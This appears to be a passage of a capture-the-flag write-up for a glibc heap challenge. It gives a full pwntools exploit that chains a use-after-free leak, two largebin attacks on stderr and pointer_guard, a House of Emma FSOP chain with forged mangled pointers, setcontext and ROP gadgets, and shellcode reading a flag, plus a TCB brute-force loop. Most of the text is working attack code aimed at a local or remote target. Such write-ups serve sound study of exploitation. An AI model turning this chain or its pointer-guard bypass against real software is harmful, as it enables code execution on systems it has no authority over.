  1. Leak an Address via Use-After-Free (UAF) Primitive: This allows us to create chunk overlapping, providing the foundation for further exploitation.
  2. Hijack the stderr Pointer: Using a Largebin Attack, we overwrite the stderr pointer with a known address, specifically the victim largebin chunk.
  3. Hijack the pointer_guard (__pointer_chk_guard): A second Largebin Attack targets the pointer_guard stored in fs:[0x30], which is critical for bypassing security checks.
  4. Modify the Top Chunk Size: We consolidate a freed unsorted bin chunk into the top chunk, enabling us to manipulate the metadata on the overlapping top chunk.
  5. House of Emma Attack Chain: We hijack the __io_functions.write and __cookie pointers in the _IO_cookie_file structure. After modifying the vtable pointer to _IO_cookie_jumps+0x40, we overwrite the RIP and gain control of the execution flow. In my EXP, the exploitation uses gadgets such as getservkey_handle+276 and setcontext+61 to manipulate the control flow.
  6. ORW (Open, Read, Write) Chain: Finally, on the return address of the setcontext attack chain, we place an ORW chain to read the flag.

Brute Force TCB

We mentioned earlier that the pointer guard is stored at fs:[0x30], which can be viewed in GDB, allowing us to calculate the offset relative to the leaked LIBC base address.

However, this offset can vary across different environments, as it is dynamically initialized by the linker (ld). Additionally, random padding between the ld and LIBC base addresses makes it harder to pinpoint the exact location.

When exploiting this type of challenge on a remote server, it may become necessary to brute-force the address of the Thread Control Block (TCB) pointers stored in the FS register. The lower 12 bits of the TCB-pointer address remain constant, so the brute-forcing process typically focuses on the 4th, 5th, and 6th hex digits of the 64-bit address. Here's an example of a brute-forcing script:

for x in range(0x10):
    for y in range(0x10):
        try:
            libc_base = 0xdeadbeef
            offset = 0x6 << 20	# 6th: i.e. starts from 0x600000
            offset += x << 16	# 5th: from 0x600000 to 0x6F0000
            offset += y << 12	# 4th: Increment within each 0x1000 (4KB) memory page
            ld_base = libc_base + offset
            log.success("try offset:\t" + hex(offset))
            # exploit script
            exp()        
        except EOFError:
            p.close()

As an alternative, we can also set up a Docker environment to simulate the remote target, allowing us to test and identify the ld base address before launching the actual exploit.

EXP

Detailed explanations are provided within the comments in the Python script. And you will need to modify the pointer_guard value according to your environment for specific offset:

from pwn import *
import inspect


def g(gdbscript=''):
    if mode['local']:
        sysroot = None
        if libc_path != '':
            sysroot = os.path.dirname(libc_path)
        gdb.attach(p, gdbscript=gdbscript, sysroot=sysroot)
        if gdbscript == '':
            raw_input()
    
    elif mode['remote']:
        gdb.attach((remote_ip_addr, remote_port), gdbscript)
        if gdbscript == '':
            raw_input


def pa(addr):
    frame = inspect.currentframe().f_back
    variables = {k: v for k, v in frame.f_locals.items() if v is addr}
    desc = next(iter(variables.keys()), "unknown")
    info('@{} ---> %#x'.format(desc), addr)
    

s       = lambda data                 :p.send(data)
sa      = lambda delim,data           :p.sendafter(delim, data)
sl      = lambda data                 :p.sendline(data)
sla     = lambda delim,data           :p.sendlineafter(delim, data)
r       = lambda num=4096             :p.recv(num)
ru      = lambda delim, drop=True     :p.recvuntil(delim, drop)
l64     = lambda                      :u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
uu64    = lambda data                 :u64(data.ljust(8, b'\0'))
    

def rol(xor, shift, bit_size):
    """Performs a bitwise left rotate (ROL) on the enc."""
    return ((xor << shift) | (xor >> (bit_size - shift))) & ((1 << bit_size) - 1)

def PTR_MANGLE(ptr, ptr_guard, shift, bit_size):
    xor = ptr ^ ptr_guard
    return rol(xor, shift, bit_size)


def add(idx, size):
    global opcodes
    op  = p8(0x1)
    op += p8(idx)
    op += p16(size)
    opcodes += op


def free(idx):
    global opcodes
    op  = p8(0x2)
    op += p8(idx)
    opcodes += op


def edit(idx, buf):
    global opcodes
    op  = p8(0x4)
    op += p8(idx)
    op += p16(len(buf))
    op += buf
    opcodes += op


def show(idx):
    global opcodes
    op  = p8(0x3)
    op += p8(idx)
    opcodes += op
    

def run_opcode():
    global opcodes
    opcodes += p8(0x5)
    sa("opcode\n", opcodes)
    # print('[!] Run opcodes: ', str(opcodes))
    opcodes = b""


opcodes  = b''
deadbeef = p64(0xdeadbeef)


def exp():
    # -------- 1 -------- Leak Addresses
    # UAF
    add(0, 0x410)
    add(1, 0x410)
    add(2, 0x420)
    add(3, 0x410)
    free(2)         # 2 -> usbin
    add(4, 0x430)   # 2 -> lbin
    show(2)
    run_opcode()
    libc_base = l64() - 0x1f30b0  # main_arena + 1104
    pa(libc_base)
    edit(2, b'a'*0x10)
    show(2)
    run_opcode()
    ru(b'a'*0x10)
    heap_base = uu64(r(6)) - 0x2ae0
    pa(heap_base)
    
    # ------- 2 -------- Bullets
    stderr           = libc_base + libc.sym['stderr']
    _IO_cookie_jumps = libc_base + libc.sym['_IO_cookie_jumps']
    ptr_guard_addr   = libc_base - 0x28c0 + 0x30 # fs:[0x30]
    setcontext       = libc_base + libc.sym['setcontext'] + 61
    mprotect         = libc_base + libc.sym['mprotect']
    gksh_gadget      = libc_base + 0x146020 # mov rdx, [rdi + 8]; mov [rsp], rax; call [rdx + 0x20]; 
    pa(stderr)
    pa(ptr_guard_addr)
    pa(_IO_cookie_jumps)
    pa(setcontext)
    pa(gksh_gadget)
    
    rop 	    = ROP(libc)
    p_rdi_r     = libc_base + rop.find_gadget(['pop rdi', 'ret'])[0]
    p_rsi_r     = libc_base + rop.find_gadget(['pop rsi', 'ret'])[0]
    p_rdx_rbx_r = libc_base + rop.find_gadget(['pop rdx', 'pop rbx', 'ret'])[0]
    p_rax_r     = libc_base + rop.find_gadget(['pop rax', 'ret'])[0]
    syscall_r   = libc_base + rop.find_gadget(['syscall', 'ret'])[0]
    ret         = libc_base + rop.find_gadget(['ret'])[0]
    
    fakeIO_addr    = heap_base+0x22a0   # 0
    mprotect_chain = [p_rdi_r, fakeIO_addr&(~0xfff), p_rsi_r, 0x4000, \
                    p_rdx_rbx_r, 7, 0, mprotect, fakeIO_addr+0x140]	# 0x48 bytes
    orw_chain      = asm(shellcraft.cat('./flag'))	# 0x23 bytes
    pa(fakeIO_addr)
    
    # -------- 3 -------- Largebin Attack stderr
    free(0) 
    pl = flat({
        0x0:  [libc_base+0x1f30b0, libc_base+0x1f30b0],
        0x10: [heap_base+0x2ae0, stderr-0x20],  # hijack bk_nextsize
    })
    edit(2, pl)     # 2 -> lbin larger
    add(5, 0x430)   # 0 -> lbin smaller <- *stderr
    # recover 2
    pl = flat({
        0x0: [heap_base+0x22a0, libc_base+0x1f30b0],
        0x10: [heap_base+0x22a0, heap_base+0x22a0], # address of heap 0
    })
    edit(2, pl)
    # recover 0
    pl = flat({
        0x0: [libc_base+0x1f30b0, heap_base+0x2ae0],
        0x10: [heap_base+0x2ae0, heap_base+0x2ae0], # address of heap 2
    })
    edit(0, pl)
    add(2, 0x420)
    add(0, 0x410)
    run_opcode()
    
    # -------- 4 -------- Largebin Attack Pointer Gurard
    free(2)
    add(6, 0x430)
    free(0)
    pl = flat({
        0x0:  [libc_base+0x1f30b0, libc_base+0x1f30b0],
        0x10: [heap_base+0x2ae0, ptr_guard_addr-0x20],  # hijack bk_nextsize
    })
    edit(2, pl)     # 2 -> lbin larger
    add(7, 0x450)   # 0 -> lbin smaller <- *ptr_guard_addr
    # recover 2
    pl = flat({
        0x0: [heap_base+0x22a0, libc_base+0x1f30b0],
        0x10: [heap_base+0x22a0, heap_base+0x22a0], # address of heap 0
    })
    edit(2, pl)
    # recover 0
    pl = flat({
        0x0: [libc_base+0x1f30b0, heap_base+0x2ae0],
        0x10: [heap_base+0x2ae0, heap_base+0x2ae0], # address of heap 2
    })
    edit(0, pl)
    add(2, 0x420)
    add(0, 0x410)
    
    # -------- 5 -------- House of Kiwi
    # change top chunk size
    free(7) # 7 -> top chunk
    add(8, 0x430)
    edit(7, b'a'*0x438+p64(0x300))
    run_opcode()
    
    # FSOP
    pl = flat({
        # fake stderr & _IO_cookie_file  
        0: {  
            0x0:  0,	# _flag
            0x20: 0,	# _IO_write_base
            0x28: 1,	# _IO_write_ptr 
            0x38: 0,    # _IO_buf_base
            0x40: 0,    # _IO_buf_end
            0x68: 0,    # _chain
            0x88: fakeIO_addr+0x300,	# _lock
            0xc0: 0,	# mode
            0xd8: _IO_cookie_jumps+0x40,    # vtable
            0xe0: fakeIO_addr + 0x100,   # rdi
            # mov rdx, [rdi + 8]; mov [rsp], rax; call [rdx + 0x20]; 
            0xf0: PTR_MANGLE(gksh_gadget, heap_base+0x22a0, 0x11, 64),  # enc
        },
        # ORW
        0x100: {
            0x8:  fakeIO_addr + 0x100,  # rdx
            # <+61>:  mov rsp, [rdx+0xa0]
            # <+294>: mov rcx, [rdx+0xa8]
            # <+301>: push rcx
            # <+334>: ret
            0x20: setcontext,   # gksh_gadget ->
            0x40: orw_chain,    # mprotect ->        
            0xa0: [fakeIO_addr+0x200, ret],
        },
        0x200: {
            0x0: mprotect_chain,
        }
    }, filler='\0')
    edit(0, pl[0x10:])
    # g()
    
    # trigger
    add(8, 0x450)  # b'\x01\x08P\x04\x05'
    """
    Manually trigger after breakpoint:
    
    printf '\x01\x08P\x04\x05' > pl.bin
    cat pl.bin > /proc/<pid>/fd/0
    """
    run_opcode()
    # g()
    
    p.interactive()
    
    
if __name__ == '__main__':
    
    file_path = './pwn'
    libc_path = './libc.so.6'
    ld_path   = './ld.so'
    
    context(arch='amd64', os='linux', endian='little')
    # context.log_level='debug'
    
    e    = ELF(file_path, checksec=False)
    mode = {'local': False, 'remote': False, }
    env  = None
    
    if len(sys.argv) > 1:
        if libc_path != '':
            libc = ELF(libc_path)
        p = remote(sys.argv[1], int(sys.argv[2]))
        mode['remote'] = True
        remote_ip_addr = sys.argv[1]
        remote_port    = int(sys.argv[2])
    else:
        if libc_path != '':
            libc = ELF(libc_path)
            env  = {'LD_PRELOAD': libc_path}
        if ld_path != '':
            cmd = [ld_path, '--library-path', os.path.dirname(os.path.abspath(libc_path)), file_path]
            p   = process(cmd, env=env)
        else:
            p = process(file_path, env=env)
        mode['local'] = True
        
    exp()

Pwned:


Are you watching me?